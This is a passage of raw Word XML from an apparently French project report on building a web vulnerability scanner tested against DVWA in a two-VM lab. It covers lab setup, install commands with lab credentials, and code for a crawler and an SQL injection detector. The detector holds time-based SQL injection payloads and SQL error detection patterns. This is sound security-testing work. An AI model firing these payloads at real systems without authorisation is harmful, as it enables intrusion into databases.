            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="07E6A702" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="53867273" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Logiciels principaux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="67E19A4A" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Python 3.11, pip, venv, git</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="54E8F408" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Apache 2.4, PHP 8.1, MySQL 8.0, DVWA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36A1B1DF" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="006A6D93"/>
    <w:p w14:paraId="7431900D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3.1.2  Configuration Réseau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C702CF9" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Code : Configuration réseau Ubuntu (VM 1 — Scanner)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667A15CF"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Sur VM 1 (Scanner) — Configuration interface Host-Only</w:t>
        <w:br/>
        <w:t>sudo nano /etc/netplan/01-netcfg.yaml</w:t>
        <w:br/>
        <w:br/>
        <w:t>network:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  version: 2</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ethernets:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    enp0s3:           # Adaptateur NAT</w:t>
        <w:br/>
        <w:t xml:space="preserve">      dhcp4: true</w:t>
        <w:br/>
        <w:t xml:space="preserve">    enp0s8:           # Adaptateur Host-Only</w:t>
        <w:br/>
        <w:t xml:space="preserve">      addresses: [192.168.56.101/24]</w:t>
        <w:br/>
        <w:br/>
        <w:t>sudo netplan apply</w:t>
        <w:br/>
        <w:br/>
        <w:t># Vérification</w:t>
        <w:br/>
        <w:lastRenderedPageBreak/>
        <w:t>ip addr show enp0s8    # Doit afficher 192.168.56.101/24</w:t>
        <w:br/>
        <w:t>ping 192.168.56.102    # Test connectivité vers VM Cible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A39FBB" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>3.1.3  Installation de DVWA sur VM 2 (Cible)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4433BA9A" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>DVWA (Damn Vulnerable Web Application) version 1.10 a été installée sur la VM Cible. C'est une application PHP/MySQL conçue pour les tests de sécurité, proposant des modules vulnérables pour SQLi, XSS, CSRF, File Upload, Command Injection, etc., à plusieurs niveaux de difficulté (Low, Medium, High, Impossible).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8A6E8E" w14:textId="77777777" w:rsidR="00152CFC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05B5A0F0" wp14:editId="23EBC100">
            <wp:extent cx="4572000" cy="23402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jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="2340292"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBFF170" w14:textId="77777777" w:rsidR="00152CFC" w:rsidRPr="003325EF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Figure 4 — Page d'accueil DVWA (Damn Vulnerable Web Application) — VM Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9E23D6" w14:textId="77777777" w:rsidR="00152CFC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2657DE1D" wp14:editId="13F0D275">
            <wp:extent cx="4572000" cy="2363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jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="2363152"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD1B3E4" w14:textId="77777777" w:rsidR="00152CFC" w:rsidRPr="003325EF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Figure 5 — Interface DVWA Security : niveau de sécurité réglé sur Low</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEF0213" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Code : Installation complète de DVWA sur Ubuntu (VM 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2F8159"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 Installation LAMP (Linux Apache MySQL PHP) ──────────────────────────</w:t>
        <w:br/>
        <w:t>sudo apt update &amp;&amp; sudo apt upgrade -y</w:t>
        <w:br/>
        <w:t>sudo apt install -y apache2 php php-mysql php-gd php-xml libapache2-mod-php mysql-server git</w:t>
        <w:br/>
        <w:br/>
        <w:t># ── Sécurisation MySQL ────────────────────────────────────────────────────</w:t>
        <w:br/>
        <w:lastRenderedPageBreak/>
        <w:t>sudo mysql_secure_installation</w:t>
        <w:br/>
        <w:br/>
        <w:t># ── Création base de données DVWA ─────────────────────────────────────────</w:t>
        <w:br/>
        <w:t>sudo mysql -u root -p &lt;&lt;EOF</w:t>
        <w:br/>
        <w:t>CREATE DATABASE dvwa CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;</w:t>
        <w:br/>
        <w:t>CREATE USER 'dvwa'@'localhost' IDENTIFIED BY 'p@ssw0rd!';</w:t>
        <w:br/>
        <w:t>GRANT ALL PRIVILEGES ON dvwa.* TO 'dvwa'@'localhost';</w:t>
        <w:br/>
        <w:t>FLUSH PRIVILEGES;</w:t>
        <w:br/>
        <w:t>EOF</w:t>
        <w:br/>
        <w:br/>
        <w:t># ── Téléchargement et configuration DVWA ──────────────────────────────────</w:t>
        <w:br/>
        <w:t>cd /var/www/html</w:t>
        <w:br/>
        <w:t>sudo git clone https://github.com/digininja/DVWA.git dvwa</w:t>
        <w:br/>
        <w:t>sudo cp dvwa/config/config.inc.php.dist dvwa/config/config.inc.php</w:t>
        <w:br/>
        <w:br/>
        <w:t># Modifier config.inc.php :</w:t>
        <w:br/>
        <w:t># $_DVWA['db_user']     = 'dvwa';</w:t>
        <w:br/>
        <w:t># $_DVWA['db_password'] = 'p@ssw0rd!';</w:t>
        <w:br/>
        <w:t># $_DVWA['default_security_level'] = 'low';</w:t>
        <w:br/>
        <w:br/>
        <w:t># ── Permissions ────────────────────────────────────────────────────────────</w:t>
        <w:br/>
        <w:t>sudo chown -R www-data:www-data /var/www/html/dvwa</w:t>
        <w:br/>
        <w:t>sudo chmod -R 755 /var/www/html/dvwa/hackable/uploads</w:t>
        <w:br/>
        <w:br/>
        <w:t># ── Activation PHP et redémarrage Apache ──────────────────────────────────</w:t>
        <w:br/>
        <w:t>sudo a2enmod rewrite</w:t>
        <w:br/>
        <w:t>sudo systemctl restart apache2</w:t>
        <w:br/>
        <w:br/>
        <w:t># Accéder à http://192.168.56.102/dvwa/setup.php</w:t>
        <w:br/>
        <w:t># Cliquer sur "Create / Reset Database"</w:t>
        <w:br/>
        <w:t># Login : admin / password, Security Level : Low</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F820322" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>3.1.4  Installation du Scanner sur VM 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BEF3FD" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Code : Installation et premier test du scanner (VM 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA2F312"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 Clonage et environnement virtuel ──────────────────────────────────────</w:t>
        <w:br/>
        <w:t>git clone &lt;url-du-depot&gt; scanner</w:t>
        <w:br/>
        <w:t>cd scanner/imple</w:t>
        <w:br/>
        <w:t>python3 -m venv .venv</w:t>
        <w:br/>
        <w:t>source .venv/bin/activate      # Linux/macOS</w:t>
        <w:br/>
        <w:t># .venv\Scripts\activate       # Windows</w:t>
        <w:br/>
        <w:br/>
        <w:t># ── Dépendances ───────────────────────────────────────────────────────────</w:t>
        <w:br/>
        <w:t>pip install --upgrade pip</w:t>
        <w:br/>
        <w:t>pip install -r requirements.txt</w:t>
        <w:br/>
        <w:t># requirements.txt contient :</w:t>
        <w:br/>
        <w:t># requests&gt;=2.31.0</w:t>
        <w:br/>
        <w:t># beautifulsoup4&gt;=4.12.0</w:t>
        <w:br/>
        <w:t># lxml&gt;=4.9.0</w:t>
        <w:br/>
        <w:t># flask&gt;=3.0.0      (pour l'app de test uniquement)</w:t>
        <w:br/>
        <w:t># pytest&gt;=7.4.0     (pour les tests)</w:t>
        <w:br/>
        <w:br/>
        <w:t># ── Vérification ──────────────────────────────────────────────────────────</w:t>
        <w:br/>
        <w:t>python main.py --help</w:t>
        <w:br/>
        <w:lastRenderedPageBreak/>
        <w:t>python -m pytest tests/ -v --tb=short</w:t>
        <w:br/>
        <w:br/>
        <w:t># ── Scan de test rapide ────────────────────────────────────────────────────</w:t>
        <w:br/>
        <w:t>python main.py --url http://192.168.56.102/dvwa \</w:t>
        <w:br/>
        <w:t xml:space="preserve">               --login-url http://192.168.56.102/dvwa/login.php \</w:t>
        <w:br/>
        <w:t xml:space="preserve">               --username admin --password password \</w:t>
        <w:br/>
        <w:t xml:space="preserve">               --depth 2 --only sqli,xss \</w:t>
        <w:br/>
        <w:t xml:space="preserve">               --output test_rapide.html -v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F53E249"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3.2  Implémentation Détaillée des Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001D0854" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>3.2.1  Orchestrateur Principal (scanner/core.py)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D53117" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>La classe Scanner orchestre l'ensemble du pipeline en cinq phases séquentielles. Elle gère également l'authentification optionnelle (DVWA ou formulaire générique) avant le début du crawl, et assure la déduplication des vulnérabilités détectées par plusieurs détecteurs sur le même endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C93080" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Code : Méthode Scanner.run() — orchestration du pipeline (scanner/core.py)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E566B01"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class Scanner:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    def run(self) -&gt; list[Vulnerability]:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        start = time.perf_counter()</w:t>
        <w:br/>
        <w:t xml:space="preserve">        logger.info("Démarrage du scan sur %s", self.url)</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        # Phase 0 : Authentification (optionnelle)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        self._maybe_login()</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        # Phase 1 : Crawling</w:t>
        <w:br/>
        <w:t xml:space="preserve">        crawler = Crawler(base_url=self.url, max_depth=self.options.depth,</w:t>
        <w:br/>
        <w:t xml:space="preserve">                          max_pages=self.options.max_pages, session=self.session)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        endpoints = crawler.crawl()</w:t>
        <w:br/>
        <w:t xml:space="preserve">        self.pages_scanned = len(crawler.visited)</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        # Phase 2 : Détection (12 détecteurs en séquence)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        raw_vulns: list[Vulnerability] = []</w:t>
        <w:br/>
        <w:t xml:space="preserve">        for name in (self.options.only or list(ALL_DETECTORS.keys())):</w:t>
        <w:br/>
        <w:t xml:space="preserve">            cls = ALL_DETECTORS.get(name)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            detector = cls(session=self.session, timeout=self.options.timeout)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            targets = passive_endpoints if isinstance(detector, PassiveDetector) else endpoints</w:t>
        <w:br/>
        <w:t xml:space="preserve">            raw_vulns.extend(detector.scan_all(targets))</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        # Phase 3 : Déduplication</w:t>
        <w:br/>
        <w:t xml:space="preserve">        deduped = self._deduplicate(raw_vulns)</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        # Phase 4 : Évaluation CVSS</w:t>
        <w:br/>
        <w:t xml:space="preserve">        self.vulnerabilities = CVSSEvaluator().evaluate_all(deduped)</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        # Phase 5 : Rapport HTML</w:t>
        <w:br/>
        <w:t xml:space="preserve">        self.duration = time.perf_counter() - start</w:t>
        <w:br/>
        <w:t xml:space="preserve">        self._report_path = HTMLReporter(self.options.output).save(</w:t>
        <w:br/>
        <w:t xml:space="preserve">            self.vulnerabilities, target_url=self.url,</w:t>
        <w:br/>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            duration=self.duration, pages_scanned=self.pages_scanned)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return self.vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2453CA4D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3.2.2  Crawler BFS (crawler/crawler.py)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D84A3A5" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Le Crawler utilise une file FIFO (collections.deque) pour explorer l'application en largeur d'abord. Chaque URL visitée est canonisée (suppression des paramètres query) avant d'être ajoutée à l'ensemble visited, évitant ainsi les visites redondantes. Les endpoints sont dédupliqués par signature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2486C935" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Code : Algorithme BFS complet du Crawler (crawler/crawler.py)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E1CF0B"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@dataclass</w:t>
        <w:br/>
        <w:t>class Endpoint:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    url: str</w:t>
        <w:br/>
        <w:t xml:space="preserve">    method: str = "GET"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    params: dict[str, str] = field(default_factory=dict)       # paramètres GET</w:t>
        <w:br/>
        <w:t xml:space="preserve">    form_fields: dict[str, str] = field(default_factory=dict)  # champs POST</w:t>
        <w:br/>
        <w:t xml:space="preserve">    file_fields: list[str] = field(default_factory=list)       # champs file</w:t>
        <w:br/>
        <w:t xml:space="preserve">    enctype: str = ""</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    def signature(self) -&gt; str:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        keys = ",".join(sorted(self.params.keys() | self.form_fields.keys()))</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return f"{self.method}:{self.url}?{keys}"</w:t>
        <w:br/>
        <w:br/>
        <w:t>def crawl(self) -&gt; list[Endpoint]:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    queue: deque[tuple[str, int]] = deque([(self.base_url, 0)])</w:t>
        <w:br/>
        <w:t xml:space="preserve">    seen_signatures: set[str] = set()</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    while queue and len(self.visited) &lt; self.max_pages:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        url, depth = queue.popleft()</w:t>
        <w:br/>
        <w:t xml:space="preserve">        canonical = _strip_query(url)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if canonical in self.visited or depth &gt; self.max_depth:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            continue</w:t>
        <w:br/>
        <w:t xml:space="preserve">        self.visited.add(canonical)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        resp = self._fetch(url)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if resp is None or "html" not in resp.headers.get("Content-Type",""):</w:t>
        <w:br/>
        <w:t xml:space="preserve">            continue</w:t>
        <w:br/>
        <w:t xml:space="preserve">        soup = BeautifulSoup(resp.text, "html.parser")</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        # Extraction des paramètres GET depuis l'URL courante</w:t>
        <w:br/>
        <w:t xml:space="preserve">        qs = parse_qs(urlparse(url).query, keep_blank_values=True)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if qs:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            params = {k: v[0] for k, v in qs.items()}</w:t>
        <w:br/>
        <w:t xml:space="preserve">            ep = Endpoint(url=canonical, method="GET", params=params)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            if ep.signature() not in seen_signatures:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                seen_signatures.add(ep.signature())</w:t>
        <w:br/>
        <w:t xml:space="preserve">                self.endpoints.append(ep)</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        # Extraction des formulaires</w:t>
        <w:br/>
        <w:t xml:space="preserve">        for form in soup.find_all("form"):</w:t>
        <w:br/>
        <w:t xml:space="preserve">            ep = self._parse_form(form, url)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            if ep and ep.signature() not in seen_signatures:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                seen_signatures.add(ep.signature())</w:t>
        <w:br/>
        <w:t xml:space="preserve">                self.endpoints.append(ep)</w:t>
        <w:br/>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t xml:space="preserve">        # Suivi des liens internes</w:t>
        <w:br/>
        <w:t xml:space="preserve">        for a in soup.find_all("a", href=True):</w:t>
        <w:br/>
        <w:t xml:space="preserve">            href = a["href"].strip()</w:t>
        <w:br/>
        <w:t xml:space="preserve">            if any(href.startswith(p) for p in ("javascript:", "mailto:", "tel:", "#")):</w:t>
        <w:br/>
        <w:t xml:space="preserve">                continue</w:t>
        <w:br/>
        <w:t xml:space="preserve">            if "logout" in href.lower():</w:t>
        <w:br/>
        <w:t xml:space="preserve">                continue</w:t>
        <w:br/>
        <w:t xml:space="preserve">            next_url = urljoin(url, href)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            if _same_domain(next_url, self.base_url):</w:t>
        <w:br/>
        <w:t xml:space="preserve">                queue.append((next_url, depth + 1))</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    return self.endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED0BC34" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>3.2.3  Détecteur SQLi (detectors/sqli.py)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D0DD40" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Code : Détecteur SQLi complet (detectors/sqli.py)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC4A93C"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SQL_ERROR_PATTERNS = [</w:t>
        <w:br/>
        <w:t xml:space="preserve">    r"you have an error in your sql syntax",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    r"warning:\s+mysql", r"mysql_fetch_array\(\)",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    r"unclosed quotation mark after the character string",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    r"sqlstate\[", r"pg_query\(\):", r"ora-\d{5}",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    r"microsoft sql server", r"sqlite_error",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    r"near \".*\"\: syntax error", r"postgresql.*error",</w:t>
        <w:br/>
        <w:t>]</w:t>
        <w:br/>
        <w:t>ERROR_REGEX = re.compile("|".join(SQL_ERROR_PATTERNS), re.IGNORECASE)</w:t>
        <w:br/>
        <w:t>TIME_PAYLOADS = ["' AND SLEEP(5)--", "'; WAITFOR DELAY '0:0:5'--", "' OR pg_sleep(5)--"]</w:t>
        <w:br/>
        <w:br/>
        <w:t>class SQLiDetector(BaseDetector):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    name = "SQL Injection"; owasp_id = "A03"; payloads_file = "sqli.txt"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    TIME_THRESHOLD = 4.5</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    def scan(self, endpoint: Endpoint) -&gt; list[Vulnerability]:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        vulns = []</w:t>
        <w:br/>
        <w:t xml:space="preserve">        baseline = self._baseline(endpoint)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        for param, method, base in self._iter_injection_points(endpoint):</w:t>
        <w:br/>
